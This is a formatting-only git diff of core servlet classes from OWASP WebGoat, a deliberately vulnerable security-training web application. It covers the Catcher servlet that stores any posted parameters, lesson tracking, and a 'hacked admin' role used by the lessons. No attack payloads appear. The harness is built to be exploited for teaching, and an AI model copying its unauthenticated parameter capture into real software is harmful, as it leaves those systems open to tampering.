diff --git a/main/project/JavaSource/org/owasp/webgoat/Catcher.java b/main/project/JavaSource/org/owasp/webgoat/Catcher.java
index fdba04082..563a91688 100644
--- a/main/project/JavaSource/org/owasp/webgoat/Catcher.java
+++ b/main/project/JavaSource/org/owasp/webgoat/Catcher.java
@@ -1,121 +1,116 @@ + package org.owasp.webgoat; import java.io.IOException; import java.util.Enumeration; - import javax.servlet.ServletException; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; - import org.owasp.webgoat.lessons.AbstractLesson; import org.owasp.webgoat.session.Course; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. 
* - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. + * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Bruce Mayhew WebGoat - * @created March 13, 2007 + * + * @author Bruce Mayhew WebGoat + * @created March 13, 2007 */ public class Catcher extends HammerHead { - /** + /** * */ private static final long serialVersionUID = 7441856110845727651L; /** - * Description of the Field - */ - public final static String START_SOURCE_SKIP = "START_OMIT_SOURCE"; + * Description of the Field + */ + public final static String START_SOURCE_SKIP = "START_OMIT_SOURCE"; - public final static String END_SOURCE_SKIP = "END_OMIT_SOURCE"; + public final static String END_SOURCE_SKIP = "END_OMIT_SOURCE"; - public static final String PROPERTY = "PROPERTY"; + public static final String PROPERTY = "PROPERTY"; - public static final String EMPTY_STRING = ""; + public static final String EMPTY_STRING = ""; - - /** - * Description of the Method - * - * @param request Description of the Parameter - * @param response Description of the Parameter - * @exception IOException Description of the Exception - * @exception ServletException Description of the Exception - */ - public void doPost(HttpServletRequest request, HttpServletResponse response) - throws IOException, ServletException - { + /** + * Description of the Method + * + * @param request + * 
Description of the Parameter + * @param response + * Description of the Parameter + * @exception IOException + * Description of the Exception + * @exception ServletException + * Description of the Exception + */ + public void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException + { try { - //System.out.println( "Entering doPost: " ); - //System.out.println( " - request " + request); - //System.out.println( " - principle: " + request.getUserPrincipal() ); - //setCacheHeaders(response, 0); - WebSession session = (WebSession) request.getSession(true) - .getAttribute(WebSession.SESSION); - session.update(request, response, this.getServletName()); // FIXME: Too much in this call. - - int scr = session.getCurrentScreen(); - Course course = session.getCourse(); - AbstractLesson lesson = course.getLesson(session, scr, - AbstractLesson.USER_ROLE); + // System.out.println( "Entering doPost: " ); + // System.out.println( " - request " + request); + // System.out.println( " - principle: " + request.getUserPrincipal() ); + // setCacheHeaders(response, 0); + WebSession session = (WebSession) request.getSession(true).getAttribute(WebSession.SESSION); + session.update(request, response, this.getServletName()); // FIXME: Too much in this + // call. - log(request, lesson.getClass().getName() + " | " - + session.getParser().toString()); - - String property = new String(session.getParser().getStringParameter( - PROPERTY, EMPTY_STRING)); - - // if the PROPERTY parameter is available - write all the parameters to the - // property file. No other control parameters are supported at this time. 
- if ( !property.equals(EMPTY_STRING)) - { - Enumeration e = session.getParser().getParameterNames(); + int scr = session.getCurrentScreen(); + Course course = session.getCourse(); + AbstractLesson lesson = course.getLesson(session, scr, AbstractLesson.USER_ROLE); - while (e.hasMoreElements()) - { - String name = (String) e.nextElement(); - String value= session.getParser().getParameterValues(name)[0]; - lesson.getLessonTracker(session).getLessonProperties().setProperty( - name, value); - } - } - lesson.getLessonTracker(session).store(session, lesson); - - } - catch (Throwable t) + log(request, lesson.getClass().getName() + " | " + session.getParser().toString()); + + String property = new String(session.getParser().getStringParameter(PROPERTY, EMPTY_STRING)); + + // if the PROPERTY parameter is available - write all the parameters to the + // property file. No other control parameters are supported at this time. + if (!property.equals(EMPTY_STRING)) + { + Enumeration e = session.getParser().getParameterNames(); + + while (e.hasMoreElements()) + { + String name = (String) e.nextElement(); + String value = session.getParser().getParameterValues(name)[0]; + lesson.getLessonTracker(session).getLessonProperties().setProperty(name, value); + } + } + lesson.getLessonTracker(session).store(session, lesson); + + } catch (Throwable t) { - t.printStackTrace(); - log("ERROR: " + t); + t.printStackTrace(); + log("ERROR: " + t); } - } + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/HammerHead.java b/main/project/JavaSource/org/owasp/webgoat/HammerHead.java index 0e3f8d6a9..09a3afd05 100644 --- a/main/project/JavaSource/org/owasp/webgoat/HammerHead.java +++ b/main/project/JavaSource/org/owasp/webgoat/HammerHead.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat; import java.io.IOException; 
@@ -6,14 +7,12 @@ import java.text.SimpleDateFormat; import java.util.Date; import java.util.Locale; import java.util.TimeZone; - import javax.servlet.ServletContext; import javax.servlet.ServletException; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.http.HttpSession; - import org.owasp.webgoat.lessons.AbstractLesson; import org.owasp.webgoat.lessons.WelcomeScreen; import org.owasp.webgoat.lessons.admin.WelcomeAdminScreen; 
@@ -24,32 +23,31 @@ import org.owasp.webgoat.session.UserTracker; import org.owasp.webgoat.session.WebSession; import org.owasp.webgoat.session.WebgoatContext; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ * 
@@ -61,450 +59,420 @@ import org.owasp.webgoat.session.WebgoatContext; public class HammerHead extends HttpServlet { - /** + /** * */ private static final long serialVersionUID = 645640331343188020L; /** - * Description of the Field - */ - protected static SimpleDateFormat httpDateFormat; + * Description of the Field + */ + protected static SimpleDateFormat httpDateFormat; - /** - * Set the session timeout to be 2 days - */ - private final static int sessionTimeoutSeconds = 60 * 60 * 24 * 2; + /** + * Set the session timeout to be 2 days + */ + private final static int sessionTimeoutSeconds = 60 * 60 * 24 * 2; - // private final static int sessionTimeoutSeconds = 1; + // private final static int sessionTimeoutSeconds = 1; - /** - * Properties file path - */ - public static String propertiesPath = null; + /** + * Properties file path + */ + public static String propertiesPath = null; - /** - * provides convenience methods for getting setup information - * from the ServletContext - */ - private WebgoatContext webgoatContext = null; - + /** + * provides convenience methods for getting setup information from the ServletContext + */ + private WebgoatContext webgoatContext = null; - /** - * Description of the Method - * - * @param request - * Description of the Parameter - * @param response - * Description of the Parameter - * @exception IOException - * Description of the Exception - * @exception ServletException - * Description of the Exception - */ - public void doGet(HttpServletRequest request, HttpServletResponse response) - throws IOException, ServletException - { - doPost(request, response); - } - - - /** - * Description of the Method - * - * @param request - * Description of the Parameter - * @param response - * Description of the Parameter - * @exception IOException - * Description of the Exception - * @exception ServletException - * Description of the Exception - */ - public void doPost(HttpServletRequest request, HttpServletResponse response) - throws 
IOException, ServletException - { - Screen screen = null; - - WebSession mySession = null; - try + /** + * Description of the Method + * + * @param request + * Description of the Parameter + * @param response + * Description of the Parameter + * @exception IOException + * Description of the Exception + * @exception ServletException + * Description of the Exception + */ + public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException { - // System.out.println( "HH Entering doPost: " ); - // System.out.println( " - HH request " + request); - // System.out.println( " - HH principle: " + - // request.getUserPrincipal() ); - // setCacheHeaders(response, 0); - ServletContext context = getServletContext(); - - // FIXME: If a response is written by updateSession(), do not - // call makeScreen() and writeScreen() - mySession = updateSession(request, response, context); - if (response.isCommitted()) - return; - - // Note: For the lesson to track the status, we need to update - // the lesson tracker object - // from the screen.createContent() method. The create content is - // the only point - // where the lesson "knows" what has happened. To track it at a - // latter point would - // require the lesson to have memory. - screen = makeScreen(mySession); // This calls the lesson's - // handleRequest() - if (response.isCommitted()) - return; - - // perform lesson-specific tracking activities - if (screen instanceof AbstractLesson) { - AbstractLesson lesson = (AbstractLesson) screen; - - // we do not count the initial display of the lesson screen as a visit - if ("GET".equals(request.getMethod())) { - String uri = request.getRequestURI() + "?" + request.getQueryString(); - if (! 
uri.endsWith(lesson.getLink())) - screen.getLessonTracker(mySession).incrementNumVisits(); - } else if ("POST".equals(request.getMethod()) && mySession.getPreviousScreen() == mySession.getCurrentScreen()) { - screen.getLessonTracker(mySession).incrementNumVisits(); - } - } - - // log the access to this screen for this user - UserTracker userTracker = UserTracker.instance(); - userTracker.update(mySession, screen); - log(request, screen.getClass().getName() + " | " - + mySession.getParser().toString()); - - // Redirect the request to our View servlet - String userAgent = request.getHeader("user-agent"); - String clientBrowser = "Not known!"; - if (userAgent != null) - { - clientBrowser = userAgent; - } - request.setAttribute("client.browser", clientBrowser); - request.getSession().setAttribute("websession", mySession); - request.getSession().setAttribute("course", mySession.getCourse()); - - request.getRequestDispatcher(getViewPage(mySession)).forward( - request, response); + doPost(request, response); } - catch (Throwable t) + + /** + * Description of the Method + * + * @param request + * Description of the Parameter + * @param response + * Description of the Parameter + * @exception IOException + * Description of the Exception + * @exception ServletException + * Description of the Exception + */ + public void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException { - t.printStackTrace(); - log("ERROR: " + t); - screen = new ErrorScreen(mySession, t); - } - finally - { - try - { - this.writeScreen(mySession, screen, response); - } - catch (Throwable thr) - { - thr.printStackTrace(); - log(request, "Could not write error screen: " - + thr.getMessage()); - } - WebSession.returnConnection(mySession); - // System.out.println( "HH Leaving doPost: " ); - } - } + Screen screen = null; - - private String getViewPage(WebSession webSession) - { - String page; - - // If this session has not seen the landing page yet, go there 
instead. - HttpSession session = webSession.getRequest().getSession(); - if (session.getAttribute("welcomed") == null) - { - session.setAttribute("welcomed", "true"); - page = "/webgoat.jsp"; - } - else - page = "/main.jsp"; - - return page; - } - - /** - * Description of the Method - * - * @param date - * Description of the Parameter - * @return RFC 1123 http date format - */ - protected static String formatHttpDate(Date date) - { - synchronized (httpDateFormat) - { - return httpDateFormat.format(date); - } - } - - - /** - * Return information about this servlet - * - * @return The servletInfo value - */ - public String getServletInfo() - { - return "WebGoat is sponsored by Aspect Security."; - } - - - /** - * Return properties path - * - * @return servlet context path + WEB_INF - */ - public void init() throws ServletException - { - httpDateFormat = new SimpleDateFormat("EEE, dd MMM yyyyy HH:mm:ss z", - Locale.US); - httpDateFormat.setTimeZone(TimeZone.getTimeZone("GMT")); - propertiesPath = getServletContext().getRealPath( - "./WEB-INF/webgoat.properties"); - webgoatContext = new WebgoatContext(this); - } - - - /** - * Description of the Method - * - * @param request - * Description of the Parameter - * @param message - * Description of the Parameter - */ - public void log(HttpServletRequest request, String message) - { - String output = new Date() + " | " + request.getRemoteHost() + ":" - + request.getRemoteAddr() + " | " + message; - log(output); - System.out.println(output); - } - - /* - * public List getLessons(Category category, String role) { Course - * course = mySession.getCourse(); // May need to clone the List before - * returning it. 
//return new ArrayList(course.getLessons(category, - * role)); return course.getLessons(category, role); } - */ - - /** - * Description of the Method - * - * @param s - * Description of the Parameter - * @return Description of the Return Value - */ - protected Screen makeScreen(WebSession s) - { - Screen screen = null; - int scr = s.getCurrentScreen(); - Course course = s.getCourse(); - - if (s.isUser() || s.isChallenge()) - { - if (scr == WebSession.WELCOME) - { - screen = new WelcomeScreen(s); - } - else - { - AbstractLesson lesson = course.getLesson(s, scr, - AbstractLesson.USER_ROLE); - if (lesson == null && s.isHackedAdmin()) + WebSession mySession = null; + try { - // If admin was hacked, let the user see some of the - // admin screens - lesson = course.getLesson(s, scr, - AbstractLesson.HACKED_ADMIN_ROLE); + // System.out.println( "HH Entering doPost: " ); + // System.out.println( " - HH request " + request); + // System.out.println( " - HH principle: " + + // request.getUserPrincipal() ); + // setCacheHeaders(response, 0); + ServletContext context = getServletContext(); + + // FIXME: If a response is written by updateSession(), do not + // call makeScreen() and writeScreen() + mySession = updateSession(request, response, context); + if (response.isCommitted()) return; + + // Note: For the lesson to track the status, we need to update + // the lesson tracker object + // from the screen.createContent() method. The create content is + // the only point + // where the lesson "knows" what has happened. To track it at a + // latter point would + // require the lesson to have memory. 
+ screen = makeScreen(mySession); // This calls the lesson's + // handleRequest() + if (response.isCommitted()) return; + + // perform lesson-specific tracking activities + if (screen instanceof AbstractLesson) + { + AbstractLesson lesson = (AbstractLesson) screen; + + // we do not count the initial display of the lesson screen as a visit + if ("GET".equals(request.getMethod())) + { + String uri = request.getRequestURI() + "?" + request.getQueryString(); + if (!uri.endsWith(lesson.getLink())) screen.getLessonTracker(mySession).incrementNumVisits(); + } + else if ("POST".equals(request.getMethod()) + && mySession.getPreviousScreen() == mySession.getCurrentScreen()) + { + screen.getLessonTracker(mySession).incrementNumVisits(); + } + } + + // log the access to this screen for this user + UserTracker userTracker = UserTracker.instance(); + userTracker.update(mySession, screen); + log(request, screen.getClass().getName() + " | " + mySession.getParser().toString()); + + // Redirect the request to our View servlet + String userAgent = request.getHeader("user-agent"); + String clientBrowser = "Not known!"; + if (userAgent != null) + { + clientBrowser = userAgent; + } + request.setAttribute("client.browser", clientBrowser); + request.getSession().setAttribute("websession", mySession); + request.getSession().setAttribute("course", mySession.getCourse()); + + request.getRequestDispatcher(getViewPage(mySession)).forward(request, response); + } catch (Throwable t) + { + t.printStackTrace(); + log("ERROR: " + t); + screen = new ErrorScreen(mySession, t); + } finally + { + try + { + this.writeScreen(mySession, screen, response); + } catch (Throwable thr) + { + thr.printStackTrace(); + log(request, "Could not write error screen: " + thr.getMessage()); + } + WebSession.returnConnection(mySession); + // System.out.println( "HH Leaving doPost: " ); + } + } + + private String getViewPage(WebSession webSession) + { + String page; + + // If this session has not seen the landing page 
yet, go there instead. + HttpSession session = webSession.getRequest().getSession(); + if (session.getAttribute("welcomed") == null) + { + session.setAttribute("welcomed", "true"); + page = "/webgoat.jsp"; + } + else + page = "/main.jsp"; + + return page; + } + + /** + * Description of the Method + * + * @param date + * Description of the Parameter + * @return RFC 1123 http date format + */ + protected static String formatHttpDate(Date date) + { + synchronized (httpDateFormat) + { + return httpDateFormat.format(date); + } + } + + /** + * Return information about this servlet + * + * @return The servletInfo value + */ + public String getServletInfo() + { + return "WebGoat is sponsored by Aspect Security."; + } + + /** + * Return properties path + * + * @return servlet context path + WEB_INF + */ + public void init() throws ServletException + { + httpDateFormat = new SimpleDateFormat("EEE, dd MMM yyyyy HH:mm:ss z", Locale.US); + httpDateFormat.setTimeZone(TimeZone.getTimeZone("GMT")); + propertiesPath = getServletContext().getRealPath("./WEB-INF/webgoat.properties"); + webgoatContext = new WebgoatContext(this); + } + + /** + * Description of the Method + * + * @param request + * Description of the Parameter + * @param message + * Description of the Parameter + */ + public void log(HttpServletRequest request, String message) + { + String output = new Date() + " | " + request.getRemoteHost() + ":" + request.getRemoteAddr() + " | " + message; + log(output); + System.out.println(output); + } + + /* + * public List getLessons(Category category, String role) { Course course = + * mySession.getCourse(); // May need to clone the List before returning it. 
//return new + * ArrayList(course.getLessons(category, role)); return course.getLessons(category, role); } + */ + + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Screen makeScreen(WebSession s) + { + Screen screen = null; + int scr = s.getCurrentScreen(); + Course course = s.getCourse(); + + if (s.isUser() || s.isChallenge()) + { + if (scr == WebSession.WELCOME) + { + screen = new WelcomeScreen(s); + } + else + { + AbstractLesson lesson = course.getLesson(s, scr, AbstractLesson.USER_ROLE); + if (lesson == null && s.isHackedAdmin()) + { + // If admin was hacked, let the user see some of the + // admin screens + lesson = course.getLesson(s, scr, AbstractLesson.HACKED_ADMIN_ROLE); + } + + if (lesson != null) + { + screen = lesson; + + // We need to do some bookkeeping for the hackable admin + // interface. + // This is the only place we can tell if the user + // successfully hacked the hackable + // admin and has actually accessed an admin screen. You + // need BOTH pieces of information + // in order to satisfy the remote admin lesson. + + s.setHasHackableAdmin(screen.getRole()); + + lesson.handleRequest(s); + s.setCurrentMenu(lesson.getCategory().getRanking()); + } + else + { + screen = new ErrorScreen(s, "Invalid screen requested. Try: http://localhost/WebGoat/attack"); + } + } + } + else if (s.isAdmin()) + { + if (scr == WebSession.WELCOME) + { + screen = new WelcomeAdminScreen(s); + } + else + { + // Admin can see all roles. + // FIXME: should be able to pass a list of roles. + AbstractLesson lesson = course.getLesson(s, scr, AbstractLesson.ADMIN_ROLE); + if (lesson == null) + { + lesson = course.getLesson(s, scr, AbstractLesson.HACKED_ADMIN_ROLE); + } + if (lesson == null) + { + lesson = course.getLesson(s, scr, AbstractLesson.USER_ROLE); + } + + if (lesson != null) + { + screen = lesson; + + // We need to do some bookkeeping for the hackable admin + // interface. 
+ // This is the only place we can tell if the user + // successfully hacked the hackable + // admin and has actually accessed an admin screen. You + // need BOTH pieces of information + // in order to satisfy the remote admin lesson. + + s.setHasHackableAdmin(screen.getRole()); + + lesson.handleRequest(s); + s.setCurrentMenu(lesson.getCategory().getRanking()); + } + else + { + screen = new ErrorScreen(s, + "Invalid screen requested. Try Setting Admin to false or Try: http://localhost/WebGoat/attack"); + } + } } - if (lesson != null) + return (screen); + } + + /** + * This method sets the required expiration headers in the response for a given RunData object. + * This method attempts to set all relevant headers, both for HTTP 1.0 and HTTP 1.1. + * + * @param response + * The new cacheHeaders value + * @param expiry + * The new cacheHeaders value + */ + protected static void setCacheHeaders(HttpServletResponse response, int expiry) + { + if (expiry == 0) { - screen = lesson; - - // We need to do some bookkeeping for the hackable admin - // interface. - // This is the only place we can tell if the user - // successfully hacked the hackable - // admin and has actually accessed an admin screen. You - // need BOTH pieces of information - // in order to satisfy the remote admin lesson. - - s.setHasHackableAdmin(screen.getRole()); - - lesson.handleRequest(s); - s.setCurrentMenu(lesson.getCategory().getRanking()); + response.setHeader("Pragma", "no-cache"); + response.setHeader("Cache-Control", "no-cache"); + response.setHeader("Expires", formatHttpDate(new Date())); } else { - screen = new ErrorScreen(s, - "Invalid screen requested. 
Try: http://localhost/WebGoat/attack"); + Date expiryDate = new Date(System.currentTimeMillis() + expiry); + response.setHeader("Expires", formatHttpDate(expiryDate)); } - } } - else if (s.isAdmin()) + + /** + * Description of the Method + * + * @param request + * Description of the Parameter + * @param response + * Description of the Parameter + * @param context + * Description of the Parameter + * @return Description of the Return Value + */ + protected WebSession updateSession(HttpServletRequest request, HttpServletResponse response, ServletContext context) + throws IOException { - if (scr == WebSession.WELCOME) - { - screen = new WelcomeAdminScreen(s); - } - else - { - // Admin can see all roles. - // FIXME: should be able to pass a list of roles. - AbstractLesson lesson = course.getLesson(s, scr, - AbstractLesson.ADMIN_ROLE); - if (lesson == null) + HttpSession hs; + hs = request.getSession(true); + + // System.out.println( "HH Entering Session_id: " + hs.getId() ); + // dumpSession( hs ); + // Get our session object out of the HTTP session + WebSession session = null; + Object o = hs.getAttribute(WebSession.SESSION); + + if ((o != null) && o instanceof WebSession) { - lesson = course.getLesson(s, scr, - AbstractLesson.HACKED_ADMIN_ROLE); - } - if (lesson == null) - { - lesson = course.getLesson(s, scr, AbstractLesson.USER_ROLE); - } - - if (lesson != null) - { - screen = lesson; - - // We need to do some bookkeeping for the hackable admin - // interface. - // This is the only place we can tell if the user - // successfully hacked the hackable - // admin and has actually accessed an admin screen. You - // need BOTH pieces of information - // in order to satisfy the remote admin lesson. - - s.setHasHackableAdmin(screen.getRole()); - - lesson.handleRequest(s); - s.setCurrentMenu(lesson.getCategory().getRanking()); + session = (WebSession) o; } else { - screen = new ErrorScreen( - s, - "Invalid screen requested. 
Try Setting Admin to false or Try: http://localhost/WebGoat/attack"); + // Create new custom session and save it in the HTTP session + // System.out.println( "HH Creating new WebSession: " ); + session = new WebSession(webgoatContext, context); + hs.setAttribute(WebSession.SESSION, session); + // reset timeout + hs.setMaxInactiveInterval(sessionTimeoutSeconds); + } - } + + session.update(request, response, this.getServletName()); + + // to authenticate + // System.out.println( "HH Leaving Session_id: " + hs.getId() ); + // dumpSession( hs ); + return (session); } - return (screen); - } - - - /** - * This method sets the required expiration headers in the response for - * a given RunData object. This method attempts to set all relevant - * headers, both for HTTP 1.0 and HTTP 1.1. - * - * @param response - * The new cacheHeaders value - * @param expiry - * The new cacheHeaders value - */ - protected static void setCacheHeaders(HttpServletResponse response, - int expiry) - { - if (expiry == 0) + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @param response + * Description of the Parameter + * @exception IOException + * Description of the Exception + */ + protected void writeScreen(WebSession s, Screen screen, HttpServletResponse response) throws IOException { - response.setHeader("Pragma", "no-cache"); - response.setHeader("Cache-Control", "no-cache"); - response.setHeader("Expires", formatHttpDate(new Date())); + response.setContentType("text/html"); + + PrintWriter out = response.getWriter(); + + if (s == null) + { + screen = new ErrorScreen(s, "Page to display was null"); + } + + // set the content-length of the response. + // Trying to avoid chunked-encoding. 
(Aspect required) + response.setContentLength(screen.getContentLength()); + response.setHeader("Content-Length", screen.getContentLength() + ""); + + screen.output(out); + out.close(); } - else - { - Date expiryDate = new Date(System.currentTimeMillis() + expiry); - response.setHeader("Expires", formatHttpDate(expiryDate)); - } - } - - - /** - * Description of the Method - * - * @param request - * Description of the Parameter - * @param response - * Description of the Parameter - * @param context - * Description of the Parameter - * @return Description of the Return Value - */ - protected WebSession updateSession(HttpServletRequest request, - HttpServletResponse response, ServletContext context) - throws IOException - { - HttpSession hs; - hs = request.getSession(true); - - // System.out.println( "HH Entering Session_id: " + hs.getId() ); - // dumpSession( hs ); - // Get our session object out of the HTTP session - WebSession session = null; - Object o = hs.getAttribute(WebSession.SESSION); - - if ((o != null) && o instanceof WebSession) - { - session = (WebSession) o; - } - else - { - // Create new custom session and save it in the HTTP session - // System.out.println( "HH Creating new WebSession: " ); - session = new WebSession(webgoatContext, context); - hs.setAttribute(WebSession.SESSION, session); - // reset timeout - hs.setMaxInactiveInterval(sessionTimeoutSeconds); - - } - - session.update(request, response, this.getServletName()); - - // to authenticate - // System.out.println( "HH Leaving Session_id: " + hs.getId() ); - // dumpSession( hs ); - return (session); - } - - - /** - * Description of the Method - * - * @param s - * Description of the Parameter - * @param response - * Description of the Parameter - * @exception IOException - * Description of the Exception - */ - protected void writeScreen(WebSession s, Screen screen, HttpServletResponse response) - throws IOException - { - response.setContentType("text/html"); - - PrintWriter out = 
response.getWriter(); - - if (s == null) - { - screen = new ErrorScreen(s, "Page to display was null"); - } - - // set the content-length of the response. - // Trying to avoid chunked-encoding. (Aspect required) - response.setContentLength(screen.getContentLength()); - response.setHeader("Content-Length", screen.getContentLength() + ""); - - screen.output(out); - out.close(); - } } diff --git a/main/project/JavaSource/org/owasp/webgoat/LessonSource.java b/main/project/JavaSource/org/owasp/webgoat/LessonSource.java index f4043bace..20f4c1dc5 100644 --- a/main/project/JavaSource/org/owasp/webgoat/LessonSource.java +++ b/main/project/JavaSource/org/owasp/webgoat/LessonSource.java 
@@ -1,42 +1,40 @@
+
 package org.owasp.webgoat;
 import java.io.IOException;
 import java.io.PrintWriter;
-
 import javax.servlet.ServletException;
 import javax.servlet.http.HttpServletRequest;
 import javax.servlet.http.HttpServletResponse;
-
 import org.owasp.webgoat.lessons.AbstractLesson;
 import org.owasp.webgoat.session.Course;
 import org.owasp.webgoat.session.WebSession;
-/*******************************************************************************
+
+/***************************************************************************************************
 *
 *
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
 *
 * Copyright (c) 2002 - 2007 Bruce Mayhew
 *
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
 *
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
 *
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
 *
 * Getting Source ==============
 *
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
 *
 * For details, please see http://code.google.com/p/webgoat/
 *
@@ -98,7 +96,8 @@ public class LessonSource extends HammerHead
 AbstractLesson lesson = course.getLesson(session, scr, AbstractLesson.USER_ROLE);
 lesson.getLessonTracker(session).setViewedSolution(true);
- } else if (showSource)
+ }
+ else if (showSource)
 {
 // Get the Java source of the lesson. FIXME: Not needed
@@ -109,19 +108,16 @@ public class LessonSource extends HammerHead
 AbstractLesson lesson = course.getLesson(session, scr, AbstractLesson.USER_ROLE);
 lesson.getLessonTracker(session).setViewedSource(true);
 }
- }
- catch (Throwable t)
+ } catch (Throwable t)
 {
 t.printStackTrace();
 log("ERROR: " + t);
- }
- finally
+ } finally
 {
 try
 {
 this.writeSource(source, response);
- }
- catch (Throwable thr)
+ } catch (Throwable thr)
 {
 thr.printStackTrace();
 log(request, "Could not write error screen: " + thr.getMessage());
@@ -155,12 +151,10 @@ public class LessonSource extends HammerHead
 source = lesson.getSource(s);
 }
 }
- if (source == null)
- {
- return "Source code is not available. Contact " + s.getWebgoatContext().getFeedbackAddress();
- }
+ if (source == null) { return "Source code is not available. Contact " +
+ s.getWebgoatContext().getFeedbackAddress(); }
 return (source.replaceAll("(?s)" + START_SOURCE_SKIP + ".*" + END_SOURCE_SKIP,
- "Code Section Deliberately Omitted"));
+ "Code Section Deliberately Omitted"));
 }
 protected String getSolution(WebSession s)
@@ -180,10 +174,8 @@ public class LessonSource extends HammerHead
 source = lesson.getSolution(s);
 }
 }
- if (source == null)
- {
- return "Solution is not available. Contact " + s.getWebgoatContext().getFeedbackAddress();
- }
+ if (source == null) { return "Solution is not available. Contact " +
+ s.getWebgoatContext().getFeedbackAddress(); }
 return (source);
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/AbstractLesson.java b/main/project/JavaSource/org/owasp/webgoat/lessons/AbstractLesson.java
index f29f60903..f54f799e6 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/AbstractLesson.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/AbstractLesson.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 import java.io.BufferedReader;
@@ -27,32 +28,31 @@ import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.session.WebgoatContext;
 import org.owasp.webgoat.session.WebgoatProperties;
-/*******************************************************************************
+
+/***************************************************************************************************
 *
 *
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
 *
 * Copyright (c) 2002 - 2007 Bruce Mayhew
 *
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
